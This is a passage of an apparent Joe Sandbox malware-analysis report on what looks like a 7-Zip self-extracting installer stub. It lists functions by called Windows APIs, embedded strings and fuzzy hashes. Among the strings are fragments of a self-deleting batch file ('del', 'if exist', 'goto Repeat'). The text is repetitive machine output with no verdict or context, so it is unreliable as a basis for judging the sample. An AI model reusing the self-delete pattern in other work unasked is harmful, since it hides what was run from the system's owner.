                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$Window$??3@$EnableLongMenuShowText$CreateFocusInstanceMessageSendSystemTimer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2865198823-0
                                                                                                                                              • Opcode ID: 31d213a217e679eee7caa83b6e8962264d3fe4114565d4175e179552f65ac473
                                                                                                                                              • Instruction ID: c2908e9667d8368a2faf823abfe8b1ec5556b958f635fa6741399732f2738d60
                                                                                                                                              • Opcode Fuzzy Hash: 31d213a217e679eee7caa83b6e8962264d3fe4114565d4175e179552f65ac473
                                                                                                                                              • Instruction Fuzzy Hash: D1611375600A4182EB16EB63F8547EA63A1BBCDBC5F548028AB4E47BB6CF3CD8458744
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$??2@EnvironmentVariable$??3@ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                              • String ID: 7zSfxString%d
                                                                                                                                              • API String ID: 579950010-3906403175
                                                                                                                                              • Opcode ID: 53bbe095b864e146d7c704bffd2da1ab7094653d32718c2add295021c4666381
                                                                                                                                              • Instruction ID: 70b70016266b01a59d2817593f45409e52cee35171342eb85d29ca9cbc831483
                                                                                                                                              • Opcode Fuzzy Hash: 53bbe095b864e146d7c704bffd2da1ab7094653d32718c2add295021c4666381
                                                                                                                                              • Instruction Fuzzy Hash: 92516972205A4186EB56DF62E8407E933A2F79CBD4F444129FB1A87BB4DF38C949C740
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                                                                                              • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                                                                                              • API String ID: 2639302590-365843014
                                                                                                                                              • Opcode ID: 894772936f4937b711b481bb04c2a273af696cad1f90237fdae8d8223eb41ba5
                                                                                                                                              • Instruction ID: c83a0b667c30abcfd619a9940c4eea38dc707d73ae63cd64fb0d3cb0556ad1b4
                                                                                                                                              • Opcode Fuzzy Hash: 894772936f4937b711b481bb04c2a273af696cad1f90237fdae8d8223eb41ba5
                                                                                                                                              • Instruction Fuzzy Hash: 0031F671201B0196EB56DB93B858BE863A1B7ACFC4F598129AF0947B74EF3CC949C700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1862581289-0
                                                                                                                                              • Opcode ID: 40327e7a4e627b576589c04b300327143c20904d628a63e6dedda5f8708aa82e
                                                                                                                                              • Instruction ID: 3e4da905ce96bf9f738c15ed4aea8ee97a65dc1dff7fb7a22644383a93eee8e4
                                                                                                                                              • Opcode Fuzzy Hash: 40327e7a4e627b576589c04b300327143c20904d628a63e6dedda5f8708aa82e
                                                                                                                                              • Instruction Fuzzy Hash: C2313EB1304A4191EB52DB63F8443EA63A5B7DCBD4F484225BB5A87AB5DF3CC949C700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 829399097-0
                                                                                                                                              • Opcode ID: 30c51a8269be2602cf4b410d5b781a8e3192ff5b776fab05b052ee65ac3b21ea
                                                                                                                                              • Instruction ID: 2d898ceb3f09a1eb584ffa9d8366e5f01a45126dcd79849e3f4c0ff505611167
                                                                                                                                              • Opcode Fuzzy Hash: 30c51a8269be2602cf4b410d5b781a8e3192ff5b776fab05b052ee65ac3b21ea
                                                                                                                                              • Instruction Fuzzy Hash: AE318D32215A4182EB25DB52F8847EAA3A5F7DD7E1F504129FB9E43AA4EF78C4088700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesErrorFileLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1799206407-0
                                                                                                                                              • Opcode ID: a55bb6e7dc2702947b24bbb3e5a92d34c8991f2fa135c1f2c7b83d210b82e527
                                                                                                                                              • Instruction ID: d1a060c4f630bfd89d2f2160516af3f9bcb3a2033bcc73bb429cd43d1ff9b7cc
                                                                                                                                              • Opcode Fuzzy Hash: a55bb6e7dc2702947b24bbb3e5a92d34c8991f2fa135c1f2c7b83d210b82e527
                                                                                                                                              • Instruction Fuzzy Hash: FF015EB020854181FB62CB67B8443E913A1AB6DBF5F540724FB7A876F6DB38C9898604
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionThrow$??2@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3392402120-0
                                                                                                                                              • Opcode ID: 2b3263cd92e1bb3e7898cc00a8deec63dd0b77c2faebd3789d8185054e8a1bb3
                                                                                                                                              • Instruction ID: f0828402b5f177350ef33b43c1acec269240831d9e3c8cbd07829b04a4968652
                                                                                                                                              • Opcode Fuzzy Hash: 2b3263cd92e1bb3e7898cc00a8deec63dd0b77c2faebd3789d8185054e8a1bb3
                                                                                                                                              • Instruction Fuzzy Hash: 8FB16977600A8482EB15DF2AD4943AD7761F788FC8F568126EB4E0BB68DF36D545C700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@DiskFreeMessageReadSendSpaceWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1707747161-0
                                                                                                                                              • Opcode ID: 2c14cbb08742c1dc98fa383900268a955b434cb97bc56c82b568867ab9d26cd1
                                                                                                                                              • Instruction ID: 2ea032ec4b72df50374d415269d0b5e3f8fe620ad009fccfd85bb2db6252b9f8
                                                                                                                                              • Opcode Fuzzy Hash: 2c14cbb08742c1dc98fa383900268a955b434cb97bc56c82b568867ab9d26cd1
                                                                                                                                              • Instruction Fuzzy Hash: 2D016DB021654182FB56DB67B965BD527A1E7CD3C4F901018FB0E87AB1DF3DC8958B01
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                              • Opcode ID: 90ec375b5e6c540963a155221bc9aa3d0d2991a3480f7b8e78673c81ac2eb246
                                                                                                                                              • Instruction ID: aa65f6db82eaf8b6fea5482ebfc5d884824075850f29287f0f629c08f148ed40
                                                                                                                                              • Opcode Fuzzy Hash: 90ec375b5e6c540963a155221bc9aa3d0d2991a3480f7b8e78673c81ac2eb246
                                                                                                                                              • Instruction Fuzzy Hash: 0841C1B361469087D371DF0AF40079EB6A4F794784F518222EF8997B95DB39C059CB10
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: ec9423caf1f53a8875ef1c85f5d62d707c05fa489cd0e74cdad768862597afb8
                                                                                                                                              • Instruction ID: dfc2cb70fa74bfe19b8cd164e7a7db0a044fabddf8fa4f27e3af427a8afc0b1c
                                                                                                                                              • Opcode Fuzzy Hash: ec9423caf1f53a8875ef1c85f5d62d707c05fa489cd0e74cdad768862597afb8
                                                                                                                                              • Instruction Fuzzy Hash: 25B09230A12880E1D705AB62AC813D012A06BAC351FD00426D20986130DA6C85DA8700
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 69b6475d7a0199148ef249fbc053a23c943e0ccf4ae01405b7bd2e1dbab77975
                                                                                                                                              • Instruction ID: 42128092fb2f8a7eb19b93a0a6dff0b71e4a450f07df2cf7c4e72dc6e6bf1e2d
                                                                                                                                              • Opcode Fuzzy Hash: 69b6475d7a0199148ef249fbc053a23c943e0ccf4ae01405b7bd2e1dbab77975
                                                                                                                                              • Instruction Fuzzy Hash: 97618CB76156908BC755CF3AD1807ADBBB0F749B84F48D102EB8983790E73AD8A1CB50
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$??2@AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                                                                              • String ID: " -$h$sfxwaitall
                                                                                                                                              • API String ID: 2737579793-4132442212
                                                                                                                                              • Opcode ID: 8972559cd816c1338e3ded091cc90cf9c446310decdfcd8fdf62a62f3c69e44e
                                                                                                                                              • Instruction ID: 5d8256fca674a3c7c44ae29bb3de5cac8273207d5868712ab1cf101b1d6cc84f
                                                                                                                                              • Opcode Fuzzy Hash: 8972559cd816c1338e3ded091cc90cf9c446310decdfcd8fdf62a62f3c69e44e
                                                                                                                                              • Instruction Fuzzy Hash: C4A15172605A8182EB61DB62F4543EAA361F7D8BD0F408125FB8D47BAADF7DC549CB00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3462224810-3916222277
                                                                                                                                              • Opcode ID: 9cdd9486961c1ba4529f78a6b25b430b80e121a019844c0ce4569f9e424644ea
                                                                                                                                              • Instruction ID: 8f288d5a9edf8b55e1a971ed4cf124c8f96bcf81abbe658ec23272d680a6fed2
                                                                                                                                              • Opcode Fuzzy Hash: 9cdd9486961c1ba4529f78a6b25b430b80e121a019844c0ce4569f9e424644ea
                                                                                                                                              • Instruction Fuzzy Hash: B3415C3571478082EB158B63B898B9A7361F7D9FD5F504129EE0A43B68CF7CD88A8704
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                                                                                              • String ID: .lnk
                                                                                                                                              • API String ID: 408529070-24824748
                                                                                                                                              • Opcode ID: c4e2908f538a9d71be7905d861048102a17b934602f3cf9aa478a877f0bf1083
                                                                                                                                              • Instruction ID: 3ea1a6f865d8dbae388e70ab33fc0c8faca71d452d360aa7d3c3bd685e16543f
                                                                                                                                              • Opcode Fuzzy Hash: c4e2908f538a9d71be7905d861048102a17b934602f3cf9aa478a877f0bf1083
                                                                                                                                              • Instruction Fuzzy Hash: 72E131B2218A8591EB65DF26F4507EEB365F7C87C0F504126FB8A47AAACF79C445CB00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                                              • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                                              • API String ID: 3514532227-2281146334
                                                                                                                                              • Opcode ID: 17c648273d71f81b2a18d2ba8a7652d8b43dd48cc0c59ee98ce1cd6ab347dc83
                                                                                                                                              • Instruction ID: 1bebdc077b3eb833e3d0a359812528dac203c6a0b1ab02931543c0ba43945adb
                                                                                                                                              • Opcode Fuzzy Hash: 17c648273d71f81b2a18d2ba8a7652d8b43dd48cc0c59ee98ce1cd6ab347dc83
                                                                                                                                              • Instruction Fuzzy Hash: FA513976214A84C6EB12DB66E4503EA63A5F7DCBC0F444129EB4A47BA5DF3CC949CB00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                                              • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:$:Repeat$\$del "$if exist "$open
                                                                                                                                              • API String ID: 3007203151-2163742583
                                                                                                                                              • Opcode ID: e4681752c64c186926887c9a3016e19b2cd8f3b31a8329f02ff25b6b7a014b57
                                                                                                                                              • Instruction ID: 0c90f25fb4aceb2cd8cb76d31abb6332663f37b5dc8e5ba106e3953ebe06db35
                                                                                                                                              • Opcode Fuzzy Hash: e4681752c64c186926887c9a3016e19b2cd8f3b31a8329f02ff25b6b7a014b57
                                                                                                                                              • Instruction Fuzzy Hash: 8C513772214A8092EB11DB52F4907EAA371F7D97C4F908116FB89879BADF7DC949CB00
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                                              • String ID: IMAGES$STATIC
                                                                                                                                              • API String ID: 4202116410-1168396491
                                                                                                                                              • Opcode ID: 377b229d8a8b03171fc6d40827829fd07cc7c7df38e22e2b3b0e90d6f07125b4
                                                                                                                                              • Instruction ID: 4921713bf544ce7af8d8319e16cf28e62a735f36a40937c726eb1d176de2e4f6
                                                                                                                                              • Opcode Fuzzy Hash: 377b229d8a8b03171fc6d40827829fd07cc7c7df38e22e2b3b0e90d6f07125b4
                                                                                                                                              • Instruction Fuzzy Hash: E0410976209A9182EB26DBA6F4543DA63A0FBDCBC4F444426EF4E47B64DF3CC9498700
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: 8520d60a68563d49259b98b8a3a9cb7977f50860d2e81ab45e98cbda63846693
                                                                                                                                              • Instruction ID: d5e0c1ee3c9733249a7f879758ba962592818960cb45e9e2ea0dfaba7a677a73
                                                                                                                                              • Opcode Fuzzy Hash: 8520d60a68563d49259b98b8a3a9cb7977f50860d2e81ab45e98cbda63846693
                                                                                                                                              • Instruction Fuzzy Hash: D5D11976214A8082EB61DF26E0903EEB7A1F788BD4F504022FB8A57BA5DF39C945C701
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_140000000_89ED.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2586545124-0
                                                                                                                                              • Opcode ID: 86a8894e4e7b79cb7e9e89f64b07465219e57092d9602e0fc03c3308faee4922
                                                                                                                                              • Instruction ID: 10aa0171647b957a33768f1cea1f4e9b956126cfc8758c1a02e2fdc5be04ff48
                                                                                                                                              • Opcode Fuzzy Hash: 86a8894e4e7b79cb7e9e89f64b07465219e57092d9602e0fc03c3308faee4922
                                                                                                                                              • Instruction Fuzzy Hash: 38318A71604A418AE711DFA7A54879AB7A1F7DEBD1F044228FF8A47B68CF3CD8458B40
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
